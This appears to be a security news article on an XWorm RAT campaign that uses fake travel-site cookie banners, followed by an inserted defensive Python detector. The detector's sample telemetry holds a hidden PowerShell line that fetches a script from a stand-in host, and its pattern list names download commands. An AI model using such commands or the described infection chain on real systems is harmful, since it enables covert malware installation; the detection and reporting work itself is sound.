Cybercriminals Use Fake Travel Websites to Distribute XWorm Malware and Infect PCs

Security researchers at HP Wolf Security reported a significant uptick in cybercriminal campaigns leveraging fake travel websites to disseminate XWorm, a powerful remote access trojan (RAT).

These attacks are characterized by their use of convincing replicas of well-known travel booking platforms, such as Booking.com, designed to deceive users into initiating malware downloads under the guise of standard cookie consent procedures.

Image: Lure website with fake cookie banner imitating Booking.com

Tapping into the “click fatigue” phenomenon induced by the ubiquity of cookie banners mandated for GDPR compliance, the attackers have refined their social engineering tactics.

When a user visits one of these fraudulent sites, they are confronted with a cookie banner closely mimicking legitimate ones.

Unlike a genuine banner, this one triggers a JavaScript file download when the user clicks “Accept”. The banner then shows a loading icon and prompts the user to run the downloaded file to complete the cookie acceptance process.

This rapid exploitation of user behavior, where individuals are eager to dismiss banners and proceed with bookings, substantially increases infection rates.

Once run, the JavaScript covertly downloads two PowerShell scripts masked with .mp4 extensions to evade detection in network logs. These scripts then fetch and execute an additional .NET payload: the process injector.

By embedding and compiling malicious code at runtime, the injector launches an instance of MSBuild.exe (a legitimate Microsoft .NET Framework process) and writes and executes the XWorm malware inside it.

This technique not only facilitates stealth but also establishes persistence, ensuring the RAT remains active on the victim’s machine.
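As an added example (not code from HP Wolf Security or from this article), the chain described above can be turned into process-creation heuristics that a defender could run over endpoint telemetry. The event fields, the parent/child process names used as indicators and the sample events are constructed assumptions modelled on the article, not the campaign's actual indicators.

```python
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 style fields, simplified)."""
    parent: str   # parent image file name
    image: str    # new process image file name
    cmdline: str  # new process command line

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
BUILD_TOOLS = {"devenv.exe", "dotnet.exe", "msbuild.exe", "vbcscompiler.exe"}
FETCH_HINTS = ("http", "iwr", "invoke-webrequest", "downloadstring", "downloadfile")

def check_event(e: ProcEvent) -> list[str]:
    """Return the names of every chain stage this single event matches."""
    par, img, cmd = e.parent.lower(), e.image.lower(), e.cmdline.lower()
    hits = []
    # Stage 1: the "cookie acceptance" .js is opened from the browser by a script host.
    if par in BROWSERS and img in SCRIPT_HOSTS and ".js" in cmd:
        hits.append("browser-launched script host on a downloaded .js")
    # Stage 2: the script host hands off to PowerShell, which fetches the
    # follow-on scripts served with a media (.mp4) extension.
    if par in SCRIPT_HOSTS and img == "powershell.exe":
        hits.append("script host spawned PowerShell")
        if ".mp4" in cmd and any(h in cmd for h in FETCH_HINTS):
            hits.append("PowerShell fetching a .mp4-masked script")
    # Stage 3: MSBuild.exe used as an injection host: no build tool as parent,
    # and no project/solution file on the command line.
    if img == "msbuild.exe" and par not in BUILD_TOOLS \
            and not any(x in cmd for x in ("proj", ".sln")):
        hits.append("MSBuild.exe spawned by a non-build parent with no project file")
    return hits

def scan(events: list[ProcEvent]) -> list[tuple[str, str]]:
    """Run check_event over a batch and return (image, finding) pairs in order."""
    return [(e.image, hit) for e in events for hit in check_event(e)]

# Constructed sample telemetry modelled on the chain in the article (not real logs).
SAMPLE_EVENTS = [
    ProcEvent("chrome.exe", "wscript.exe", r'wscript.exe "C:\Users\u\Downloads\cookie_accept.js"'),
    ProcEvent("wscript.exe", "powershell.exe",
              "powershell.exe -w hidden -c iwr http://lure.example/a.mp4 -OutFile s.ps1"),
    ProcEvent("powershell.exe", "MSBuild.exe", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"),
    ProcEvent("devenv.exe", "MSBuild.exe", "MSBuild.exe MyApp.csproj /t:Build"),  # benign build
    ProcEvent("explorer.exe", "powershell.exe", "powershell.exe Get-ChildItem"),  # benign admin use
]

if __name__ == "__main__":
    for image, finding in scan(SAMPLE_EVENTS):
        print(f"{image:16} {finding}")
```

The two benign events produce no findings, so the heuristics key on the unusual parent/child relationships and the media-extension download rather than on the presence of PowerShell or MSBuild alone.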

XWorm itself is notorious for its extensive features, which allow for remote control, data exfiltration, command execution, and additional payload deployment.

The campaign’s technical sophistication is underscored by its multi-stage infection methodology, memory injection techniques, and reliance on Windows process masquerading to evade traditional endpoint detection measures.

Advanced Social Engineering

HP Wolf Security’s threat researchers noted that this shift to cookie banner-based lures signals an evolution from earlier campaigns, such as those leveraging fake CAPTCHA challenges, a method also recently observed in email-based malware propagation.

By capitalizing on routine user interactions with web security and privacy notifications, attackers are engineering novel attack vectors that bypass even advanced email gateways and endpoint protections.

Beyond travel website clones, Q1 2025 saw a broader trend in attackers abusing uncommon file types such as Windows library files (.ms-library) and Scalable Vector Graphics (.svg) to initiate infection chains.

These vectors, often delivered via spear-phishing emails, exploit features like WebDAV integrations and script obfuscation to trick users into executing malicious payloads disguised as regular documents or images.

Attackers continue to leverage trusted public infrastructure, such as GitHub and Azure Blob Storage, to host malware components and evade reputation-based filtering.

The effectiveness of these campaigns is stark: statistics from HP Sure Click indicate that email remains the dominant malware delivery vector, accounting for 62% of intercepted threats, while web downloads represent 23%.

The growing complexity and creativity of these campaigns reaffirm the necessity for heightened vigilance among users and the implementation of advanced threat isolation and endpoint protection technologies by organizations.

As cybercriminals innovate their social engineering toolkits and deployment methods, this latest wave of travel-themed malware campaigns exemplifies the persistent and adaptive nature of the modern cyber threat landscape, placing both individual users and enterprises at increased risk, especially during periods of heightened travel activity.

Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.
